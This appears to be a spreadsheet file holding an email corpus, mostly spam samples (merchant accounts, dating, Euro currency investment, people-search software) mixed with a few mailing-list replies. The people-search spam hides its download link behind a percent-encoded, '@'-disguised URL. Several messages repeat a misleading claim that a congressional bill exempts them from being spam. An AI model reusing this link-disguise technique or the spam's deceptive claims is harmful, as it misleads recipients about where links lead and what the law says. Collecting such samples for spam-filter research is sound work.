       style="BACKGROUND-COLOR: #ffff00"&gt;LIMITED TIME 
       OFFER)&lt;/SPAN&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 
       size=2&gt;C&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 size=2&gt;all 
       (Toll-Free) &lt;/FONT&gt;&lt;FONT face=Arial color=#000080 size=3&gt;1- 888 - 707- 
       4777&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 size=2&gt; with Coupon Code 
       #800&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 size=2&gt; or&lt;BR&gt;use our reply form 
       below for quickest results.&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial 
       color=#000080&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top width="50%"&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080&gt;We specialize 
       in businesses that would most likely be declined by other 
       processors:&lt;/FONT&gt;&lt;/B&gt; 
       &lt;UL&gt;
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Retail&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Home-Based Businesses&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;MLM's&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Network Marketing&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;High Volume&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Membership Sites&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;New Businesses&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Good or Bad Credit&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Adult Web Sites&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;
     &lt;TD vAlign=top width="50%"&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 
       size=3&gt;Account Features Include:&lt;/FONT&gt;&lt;/B&gt; 
       &lt;UL&gt;
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;EZ credit - &lt;U&gt;99% Approval 
         Rate&lt;/U&gt;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;Secure real-time transactions 
         on your website.&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;&lt;SPAN 
         style="BACKGROUND-COLOR: #ffff00"&gt;Application Fee of $195.00 &amp;amp; 
         Electronic Check Set-Up Fee of $295.00 WAIVED!!&lt;/SPAN&gt;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;Terminal and printer or 
         software available!&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;Equipment purchase or 100% tax 
         deductible EZ pay lease option available!&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;&lt;U&gt;Discount Rates as low as 
         1.58%&lt;/U&gt;!&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;We pay for every person you 
         refer to us for processing!&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=middle width="100%" colSpan=2&gt;
       &lt;FORM 
       onsubmit="alert('Thank you for providing us with this information. You will be contacted shortly by one of our representatives.')" 
       action=mailto:jhancock@StudentNow.net?cc=signmeup@realspecialoffers.com&amp;amp;subject=coupon_code_800 
       method=post encType=text/plain&gt;
       &lt;TABLE cellPadding=4 width="80%" bgColor=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;B&gt;&lt;FONT face=Arial color=#ff0000 
             size=2&gt;Coupon Code&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=5 value=800 
             name=coupon_code selected&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;First and Last 
             Name&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=30 
             name=name&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Company 
             Name&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=30 
             name=company_name&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Phone Number 
             where you can be reached&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT 
             name=phone_number&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;The best time to 
             call you&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=10 
             name=best_time_to_call&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Email 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=30 
             name=email_address&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;U.S. State or 
             Canadian Province&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=15 
             name=state_name&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Select your 
             Country&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;SELECT size=1 name=country&gt; 
               &lt;OPTION&gt;United States&lt;/OPTION&gt; &lt;OPTION selected&gt;choose&lt;/OPTION&gt; 
               &lt;OPTION&gt;Canada&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Type of Business 
             (Optional)&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;SELECT size=1 
               name=biz_type&gt; &lt;OPTION value="Standard Retail"&gt;Standard 
               Retail&lt;/OPTION&gt; &lt;OPTION value="store-front establishments"&gt;Store 
               Front Establishments&lt;/OPTION&gt; &lt;OPTION 
               value="Outbound telemarketing"&gt;Outbound telemarketing&lt;/OPTION&gt; 
               &lt;OPTION value=Catalog&gt;Catalog&lt;/OPTION&gt; &lt;OPTION 
               value="MO/TO merchants"&gt;MO/TO merchants&lt;/OPTION&gt; &lt;OPTION 
               value="Dating services"&gt;Dating services&lt;/OPTION&gt; &lt;OPTION 
               value="Airlines "&gt;Airlines&lt;/OPTION&gt; &lt;OPTION 
               value=Subscriptions&gt;Subscriptions&lt;/OPTION&gt; &lt;OPTION 
               value="Discount Coupon Books"&gt;Discount Coupon Books&lt;/OPTION&gt; 
               &lt;OPTION value=Audiotext&gt;Audiotext&lt;/OPTION&gt; &lt;OPTION 
               value="House Party Plans"&gt;House Party Plans&lt;/OPTION&gt; &lt;OPTION 
               value="Extended liability"&gt;Extended liability&lt;/OPTION&gt; &lt;OPTION 
               value="Home-Based Businesses "&gt;Home-Based Businesses&lt;/OPTION&gt; 
               &lt;OPTION value="Foreign Corporations"&gt;Foreign Corporations&lt;/OPTION&gt; 
               &lt;OPTION value="Vitamin / Nutrition"&gt;Vitamin / Nutrition&lt;/OPTION&gt; 
               &lt;OPTION value="Multi-Level Marketers "&gt;Multi-Level 
               Marketers&lt;/OPTION&gt; &lt;OPTION value="Electronic cash "&gt;Electronic 
               cash&lt;/OPTION&gt; &lt;OPTION value="Fulfillment Centers "&gt;Fulfillment 
               Centers&lt;/OPTION&gt; &lt;OPTION 
               value="Personals Advertising (internet)"&gt;Personals Advertising 
               (internet)&lt;/OPTION&gt; &lt;OPTION value="Adult Internet Sites"&gt;Adult 
               Internet Sites&lt;/OPTION&gt; &lt;OPTION value="Online casino"&gt;Online 
               casino&lt;/OPTION&gt; &lt;OPTION value="Other "&gt;Other&lt;/OPTION&gt; &lt;OPTION 
               selected&gt;choose&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Monthly revenue 
             in transactions (Optional)&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT 
             name=monthly_transaction_amount&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt; &lt;INPUT TYPE="submit"&gt;
       &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=middle width="100%" colSpan=2&gt;&lt;FONT face=Arial&gt;&lt;b&gt;This offer only for U.S. residents, or Canadians with a 
       valid SS# and U.S. bank account.&lt;/b&gt;&lt;/FONT&gt; 
       &lt;p&gt;&amp;nbsp;&lt;/p&gt;
     &lt;/CENTER&gt;
     &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Verdana" color="#616161"&gt;To
     be removed from this list.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana" color="#616161" size="2"&gt;&lt;font face="Verdana" color="#616161" size="4"&gt;&lt;b&gt;&lt;br&gt;
     &lt;/b&gt;&lt;/font&gt;Under Bill S.1618 TITLE III SECTION 301. Per Section 301,
     Paragraph (a) (2) (C) passed by the 105th US Congress any email or Mass
     Marketing email cannot be considered Spam as long as the sender includes
     contact information and a method of removal. To be removed mailto: &lt;a href="mailto:removed@removefactory.com"&gt;removed@removefactory.com&lt;/a&gt;
     and put &amp;quot;Remove&amp;quot; In the Subject line.&lt;/font&gt;&lt;/p&gt;
 &lt;CENTER&gt;
       &lt;P&gt;&lt;FONT face=Arial color=#ffffff&gt;&lt;B&gt;&lt;FONT size=1&gt;To be removed from future mailings, please send a blank email to.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 vroepvkbimstotvtob
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Meet other Singles just like you
</t>
  </si>
  <si>
    <t xml:space="preserve">--TEP-2108411027.1463792894.1027038601
 Content-Type: text/plain
 Dear STUART,
 Are you tired of searching for love in all the wrong places?
 Find LOVE NOW at Date.com!
 http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm2aa6syje/
 Browse through thousands of personals in your area.
 JOIN FOR FREE!
 http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm2aa6syje/
 - Search, E-mail &amp; Chat
 - Use Date.com to meet cool guys and hot girls.
 - Go 1 on 1 or use our private chat rooms.
 Click on the link to get started!
 http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm2aa6syje/
 Find LOVE NOW!
 ----------------------------------
 You have received this email because you have registerd with EmailRewardz or subscribed through one of our marketing partners. If you have received this message in error, or wish to stop receiving these great offers please click the remove link above. 
 To unsubscribe from these mailings, please click here:
 http://emailrewardz.tfmb.net/?aaaa5F.aa6syj
 --TEP-2108411027.1463792894.1027038601
 Content-Type: text/html
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#333333"&gt;EmailRewardz 
 never sends unsolicited email. You are receiving this message because you have 
 requested to receive special offers from affiliates of EmailRewardz. EmailRewardz brings you the highest quality offers with your privacy guaranteed. 
 If you no longer wish to receive these offers please follow the instructions at 
 the bottom of this message.&lt;/font&gt;&lt;br&gt;&lt;br&gt;&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="Microsoft FrontPage 5.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 background="" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=center align=middle&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=700 bgColor=#c51418 background="" 
       border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=center align=middle width=700 colSpan=3&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;FONT 
             face="Arial Black, arial" color=#ffffff size=5&gt;MEET OTHER SINGLES 
             JUST LIKE YOU&lt;/FONT&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle width=186&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;IMG 
             height=12 src="http://140.99.35.2/images/datecom/ad_1.gif" width=113 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=328&gt;&lt;FONT size=-2&gt; &lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=186&gt;&lt;FONT size=-2&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle width=186 bgColor=white&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;IMG 
             height=90 src="http://140.99.35.2/images/datecom/ad_2.gif" width=113 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD vAlign=center align=left width=328 bgColor=#ffffff&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;FONT 
             face="Arial Black, Arial" color=#c51418 size=3&gt;Tired of searching 
             for love in all the wrong places?&lt;BR&gt;Find love now, the easy 
             way.&lt;/FONT&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD vAlign=center align=middle width=186 bgColor=#ffffff&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;IMG 
             height=53 src="http://140.99.35.2/images/datecom/ad_4.gif" width=183 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle width=186&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;IMG 
             height=13 src="http://click.emailrewardz.email-publisher.com/naaaqZGaaSKm3aa6syje/" width=113 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=328&gt;&lt;FONT size=-2&gt; &lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=186&gt;&lt;FONT size=-2&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=center align=middle width=700 colSpan=3&gt;&lt;A 
             href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;FONT 
             face="Arial Black, Arial" color=#ffffff size=7&gt;JOIN FOR 
             FREE&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT face="Arial Black, Arial" color=#ffffff 
             size=6&gt;Find your soul mate today!&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
             face="Arial Black, Arial" color=#ffffff size=3&gt;BROWSE THROUGH 
             THOUSANDS OF PERSONALS IN YOUR OWN AREA.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=3 bgColor=#acacac background="" 
             border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=center align=middle width=330&gt;
                   &lt;TABLE width=330 bgColor=#ffffff background=""&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=center align=middle&gt;&lt;A 
                         href="http://click.emailrewardz.email-publisher.com/maaaqZGaaSKm1aa6syje/"&gt;&lt;FONT 
                         face="Arial Black, Arial" color=#c51418 size=6&gt;CLICK 
                         HERE&lt;/FONT&gt;&lt;BR&gt;&lt;FONT face="Arial Black, Arial" 
                         color=#c51418 size=5&gt;to Find Love Now!&lt;/FONT&gt;&lt;/A&gt; 
                     &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#333333"&gt;
   You have received this email because you have registered with EmailRewardz or 
   subscribed through one of our marketing partners. If you have received this 
   message in error, or wish to stop receiving these great offers please read further 
   for removal instructions.&lt;/font&gt;&lt;br&gt;
 &lt;center&gt;&lt;font size=-1&gt;
 &lt;a href="http://emailrewardz.tfmb.net/?aaaa5F.aa6syj"&gt;Click here&lt;/a&gt; to unsubscribe from these mailings.
 &lt;/font&gt;&lt;/center&gt;
 --TEP-2108411027.1463792894.1027038601--&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get your OWN piece of history.
</t>
  </si>
  <si>
    <t xml:space="preserve">On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro and Euro report:
 http://vicky.mothost.com/euro1/
 In addition to our currency report, you can receive
 our FREE INVESTMENT PACKAGE:
 *  Learn how $10,000 in options will leverage $1,000,000 in
 Euro Currency. This means even a small movement in the market
 has huge profit potential.
 If you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world and how you can profit!
 http://vicky.mothost.com/euro1/
 $10,000 minimum investment
 Please carefully evaluate your financial position before
 trading.  Only risk capital should be used.
 http://vicky.mothost.com/euro1/optout.html To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: What dreams are made of!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link=#333399&gt;
 &lt;font face="Verdana, Arial, Helvetica" size=3&gt;
 &lt;center&gt;&lt;b&gt;&lt;font size="5" color=#CC0066&gt;Astounding
 New Software Lets You Find&lt;br&gt;
 Out Almost Anything About Anyone&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;&lt;i&gt;&lt;font color=#333399 size=4&gt;Click here to download it right
 now (no charge card needed):&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;&lt;font color=#333399 size=4&gt;&lt;b&gt;&lt;a
 href="http://%72.%6cy%63os%2ec%6fm|%72%65%64i%72%25%33%66%25%361%252%65%2566.%2540d%2574%25%334%2e%350%6d%2565gs.%2563o%6d%252fdt4%253%66a%252ef.@%68ome.ea%72th%6cink.n%65t/%7e%36%61%66%37?a.f.@%6d%65mbers.t%72i%70o%64.%63%6fm/~n%6aax%36%30%37"&gt;Download
 Page&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font size="1" color="#333333"&gt;(This
 make take a few moments to load - please be patient)&lt;/font&gt;&lt;br&gt;
 &lt;/center&gt;&lt;br&gt;
 Find out &lt;b&gt;everything&lt;/b&gt; you ever wanted to know about:
 &lt;ul&gt;
 &lt;li&gt;your friends&lt;/li&gt;
 &lt;li&gt;your family&lt;/li&gt;
 &lt;li&gt;your enemies&lt;/li&gt;
 &lt;li&gt;your employees&lt;/li&gt;
 &lt;li&gt;yourself - Is Someone Using Your Identity?&lt;/li&gt;
 &lt;li&gt;even your boss!&lt;/li&gt;
 &lt;/ul&gt;
 &lt;b&gt;Did you know&lt;/b&gt; that you can search for
 &lt;b&gt;anyone, anytime, anywhere,&lt;/b&gt; right on the Internet?
 &lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click here: &lt;/font&gt;&lt;font
 color=#333399&gt;&lt;a
 href="http://%72.%6cy%63os%2ec%6fm|%72%65%64i%72%25%33%66%25%361%252%65%2566.%2540d%2574%25%334%2e%350%6d%2565gs.%2563o%6d%252fdt4%253%66a%252ef.@%68ome.ea%72th%6cink.n%65t/%7e%36%61%66%37?a.f.@%6d%65mbers.t%72i%70o%64.%63%6fm/~n%6aax%36%30%37"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 This &lt;b&gt;mammoth collection&lt;/b&gt; of Internet investigative tools &amp; research
 sites will provide you with nearly &lt;b&gt;400 gigantic research resources&lt;/b&gt;
 to locate information online and offline on:
 &lt;font color="#000080"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;people you trust, people you work with&lt;/li&gt;
 &lt;li&gt;screen new tenants, roommates, nannys, housekeepers&lt;/li&gt;
 &lt;li&gt;current or past employment&lt;/li&gt;
 &lt;li&gt;license plate numbers, court records, even your FBI file&lt;/li&gt;
 &lt;li&gt;unlisted &amp; reverse phone number lookup&lt;/li&gt;
 &lt;/ul&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://%72.%6cy%63os%2ec%6fm|%72%65%64i%72%25%33%66%25%361%252%65%2566.%2540d%2574%25%334%2e%350%6d%2565gs.%2563o%6d%252fdt4%253%66a%252ef.@%68ome.ea%72th%6cink.n%65t/%7e%36%61%66%37?a.f.@%6d%65mbers.t%72i%70o%64.%63%6fm/~n%6aax%36%30%37"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 &lt;blockquote&gt;&lt;font size="2"&gt;&lt;b&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Dig up information on your FRIENDS, NEIGHBORS, or BOSS!&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Locate transcripts and COURT ORDERS from all 50 states.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; CLOAK your EMAIL so your true address can't be discovered.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Find out how much ALIMONY your neighbor is paying.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Discover how to check your phones for WIRETAPS.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; &lt;i&gt;Or check yourself out&lt;/i&gt;--you may be shocked at what you find!!&lt;br&gt;
 &lt;/blockquote&gt;&lt;center&gt;&lt;font size=4 color=#333399&gt;&lt;b&gt;&lt;i&gt;These
 are only a few things&lt;br&gt;
 that you can do with this software...&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;br&gt;
 To download this software,&lt;/b&gt; and have it in less than 5 minutes, click &amp; visit our website:&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://%72.%6cy%63os%2ec%6fm|%72%65%64i%72%25%33%66%25%361%252%65%2566.%2540d%2574%25%334%2e%350%6d%2565gs.%2563o%6d%252fdt4%253%66a%252ef.@%68ome.ea%72th%6cink.n%65t/%7e%36%61%66%37?a.f.@%6d%65mbers.t%72i%70o%64.%63%6fm/~n%6aax%36%30%37"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;&lt;hr size=1 width=60%&gt;
 &lt;font size="2" color="#666666"&gt;&lt;b&gt;We respect your online time and privacy
 and honor all requests to stop further e-mails.&lt;/b&gt;&lt;small&gt;
 To stop future messages, do &lt;b&gt;NOT&lt;/b&gt; hit reply. Instead, simply click the following link
 which will send us a message with "STOP" in the subject line.
 Please do not include any correspondence -- all requests handled automatically. :)&lt;/small&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;a href="mailto:stop0607@excite.com?subject=STOP_NJAX607"&gt;[Click
 Here to Stop Further Messages]&lt;/a&gt;&lt;/center&gt;&lt;br&gt;
 &lt;font size="1" color="#666666"&gt;&lt;b&gt;
 Thank you!&lt;/b&gt; Copyright&amp;nbsp;&amp;copy; 2002, all rights reserved.&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [TG0BK5N]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Another sequences window nit
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 02 Oct 2002 11:39:13 -0500
     From:        Hal DeVore &lt;haldevore@acm.org&gt;
     Message-ID:  &lt;9288.1033576753@dimebox.bmc.com&gt;
   | Restarting exmh was necessary.
 Probably not.   Next time try clicking on the folder name in the
 sequences window for the sequence.   That is, request that sequence
 be the one displayed in the FTOC.   If the sequence doesn't exist,
 it will be cleaned up then.
 Perhaps it would be nicer if flist would do it as well, but this
 is effective enough.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: OSCOM Berkeley report: Xopus, Bitflux, Plone, Xoops
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, September 27, 2002, at 11:17 AM, Jim Whitehead wrote:
 &gt; I attended the OSCOM Open Source Content Management workshop at 
 &gt; Berkeley
 &gt; yesterday.
 I really wanted to go to this, especially to look at XOPUS. 
 Unfortunately, we're launching a new intranet at work next week and I 
 couldn't get away. XOPUS + an XML native DB such as Xindice looks like 
 something that could hit a home run.
 -- whump
 "I have a theory, it could be bunnies."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Invite: Content Management Summit, Oct. 10th New York City
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
   &lt;title&gt;This email is being sent to zzzz@jmason.org. To unsubscribe please
 visit http://www.venturereporter.net/myaccount/ . If you ever have a problem
 removing or changing your email subscriptions on our newsletters, or getting
 in touch with us, please don't hesitate to email support@venturereporter.net
 and a human will get in touch with you immediately. Venture Reporter 307
 West 36th Street, 10th Floor New York, New York 10018 Phoe: 646.473.2222
 The online content business.&lt;/title&gt;
   &lt;meta http-equiv="content-type"
  content="text/html; charset=ISO-8859-1"&gt;
 &lt;/head&gt;
   &lt;body text="#000000" bgcolor="#ffffff" link="#000099" vlink="#990099"
  alink="#000099"&gt;
 &lt;p&gt;&lt;font class="body"&gt;&lt;font size="3" class="title"&gt;&lt;img
  src="http://www.cmsummit.com/images/right_02.gif" alt="CMS" width="127"
  height="110"&gt;
  &lt;img src="http://www.cmsummit.com/images/cms_title.gif" alt="CMS"
  width="350" height="85"&gt;
  &lt;br&gt;
  &lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
 sans-serif"&gt;&lt;font size="2"&gt;Dear Friends,&lt;br&gt;
  &lt;br&gt;
  &lt;font color="#009900"&gt;&lt;b&gt;The online content business is doing fantastic.&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-bottom: 0cm;"&gt;&lt;font class="body"&gt;&lt;font
  face="Verdana, 
